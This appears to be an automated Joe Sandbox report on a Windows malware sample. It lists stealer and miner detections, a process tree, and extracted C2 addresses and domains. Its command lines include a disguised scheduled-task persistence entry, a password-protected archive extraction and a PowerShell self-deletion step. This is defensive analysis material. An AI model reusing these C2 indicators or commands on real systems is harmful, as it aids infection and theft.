Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1575244
MD5:524aff0ae21cf7d4731596e8f3967e32
SHA1:27a75996dfd0ae578e28613f275b0517c0bbd975
SHA256:a9ce24b52ece47dfb287b912c5223c5b659df5c2fece87141dfa5820ecda23fd
Infos:

Detection

ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates files in the system32 config directory
Drops password protected ZIP file
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes many files with high entropy
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ScreenConnect Tool
Yara signature match

Classification

  • System is w10x64native
  • file.exe (PID: 6748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 524AFF0AE21CF7D4731596E8F3967E32)
    • skotes.exe (PID: 6140 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 524AFF0AE21CF7D4731596E8F3967E32)
  • skotes.exe (PID: 1256 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 524AFF0AE21CF7D4731596E8F3967E32)
  • skotes.exe (PID: 8536 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 524AFF0AE21CF7D4731596E8F3967E32)
    • 0d47c4c34f.exe (PID: 8708 cmdline: "C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe" MD5: 4765874B881A2BCE3AAEFB16805EF1A5)
      • axplong.exe (PID: 8880 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 4765874B881A2BCE3AAEFB16805EF1A5)
    • C1J7SVw.exe (PID: 8908 cmdline: "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 9200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mode.com (PID: 8144 cmdline: mode 65,10 MD5: 59D1ED51ACB8C3D50F1306FD75F20E99)
        • 7z.exe (PID: 908 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1088 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4484 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6748 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3596 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4920 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3544 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3040 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 7196 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 928 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 7180 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • attrib.exe (PID: 1360 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • schtasks.exe (PID: 8236 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 796B784E98008854C27F4B18D287BA30)
            • conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • powershell.exe (PID: 6644 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • PING.EXE (PID: 7720 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • b1dc05533c.exe (PID: 7004 cmdline: "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)
      • conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • b1dc05533c.exe (PID: 6412 cmdline: "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)
    • dwVrTdy.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
      • graph.exe (PID: 1400 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
    • AzVRM7c.exe (PID: 2492 cmdline: "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
    • t5abhIx.exe (PID: 1548 cmdline: "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
    • LoaderClient.exe (PID: 8500 cmdline: "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe" MD5: EC1C0306004DB340A454EEAC2ABEDA4A)
      • LoaderClient.exe (PID: 8172 cmdline: "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe" MD5: EC1C0306004DB340A454EEAC2ABEDA4A)
        • cmd.exe (PID: 8424 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • Bxq1jd2.exe (PID: 4932 cmdline: "C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe" MD5: 876A365BDA09B9EF39605E375D677F0A)
  • axplong.exe (PID: 9040 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 4765874B881A2BCE3AAEFB16805EF1A5)
  • Intel_PTT_EK_Recertification.exe (PID: 1488 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 7840 cmdline: explorer.exe MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
    • powershell.exe (PID: 5448 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • PING.EXE (PID: 4156 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • dwVrTdy.exe (PID: 6596 cmdline: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 2756 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 1568 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 8112 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
{"C2 url": ["print-vexer.biz", "dwell-exclaim.biz", "se-blurry.biz", "impend-differ.biz", "covery-mover.biz", "formy-spill.biz", "drive-connect.cyou", "zinc-sneark.biz", "dare-curbys.biz"], "Build id": "FATE99--test"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
      • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
      Click to see the 4 entries
      SourceRuleDescriptionAuthorStrings
      00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000002.00000003.268855891646.0000000005400000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000030.00000002.270506120282.00000000025D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000023.00000002.269554816675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 25 entries
              SourceRuleDescriptionAuthorStrings
              8.2.axplong.exe.630000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                3.2.skotes.exe.9c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  5.2.0d47c4c34f.exe.b0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    6.2.axplong.exe.630000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      0.2.file.exe.660000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        Click to see the 10 entries

                        System Summary

                        barindex
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files\Windows Media Player\graph\graph.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe, ProcessId: 3532, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 928, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 8236, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 928, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 8236, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 928, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 6644, ProcessName: powershell.exe
                        No Suricata rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: file.exeAvira: detected
                        Source: dare-curbys.bizAvira URL Cloud: Label: malware
                        Source: formy-spill.bizAvira URL Cloud: Label: malware
                        Source: https://drive-connect.cyou/apiAvira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeAvira: detection malicious, Label: TR/AD.Nekark.eiqyn
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exeAvira: detection malicious, Label: TR/AD.Nekark.eiqyn
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exeAvira: detection malicious, Label: HEUR/AGEN.1306956
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exeAvira: detection malicious, Label: TR/AD.Nekark.eiqyn
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeAvira: detection malicious, Label: TR/AD.Nekark.eiqyn
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exeAvira: detection malicious, Label: TR/AD.Nekark.eiqyn
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                        Source: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
                        Source: b1dc05533c.exe.7004.13.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["print-vexer.biz", "dwell-exclaim.biz", "se-blurry.biz", "impend-differ.biz", "covery-mover.biz", "formy-spill.biz", "drive-connect.cyou", "zinc-sneark.biz", "dare-curbys.biz"], "Build id": "FATE99--test"}
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exeReversingLabs: Detection: 62%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeReversingLabs: Detection: 71%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\C1J7SVw[1].exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exeReversingLabs: Detection: 66%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exeReversingLabs: Detection: 26%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exeReversingLabs: Detection: 23%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exeReversingLabs: Detection: 58%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[3].exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeReversingLabs: Detection: 71%
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeReversingLabs: Detection: 62%
                        Source: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exeReversingLabs: Detection: 58%
                        Source: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exeReversingLabs: Detection: 26%
                        Source: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exeReversingLabs: Detection: 23%
                        Source: C:\Users\user\AppData\Local\Temp\1015364001\b2d27d0fa4.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\1015365001\82bc687fc3.exeReversingLabs: Detection: 71%
                        Source: C:\Users\user\AppData\Local\Temp\1015366001\dce9e93496.exeReversingLabs: Detection: 66%
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 47%
                        Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 70%
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeReversingLabs: Detection: 70%
                        Source: file.exeReversingLabs: Detection: 47%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeJoe Sandbox ML: detected
                        Source: file.exeJoe Sandbox ML: detected

                        Bitcoin Miner

                        barindex
                        Source: Yara matchFile source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.3.Intel_PTT_EK_Recertification.exe.2afb8010000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.269554816675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.269556913458.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 1488, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7840, type: MEMORYSTR
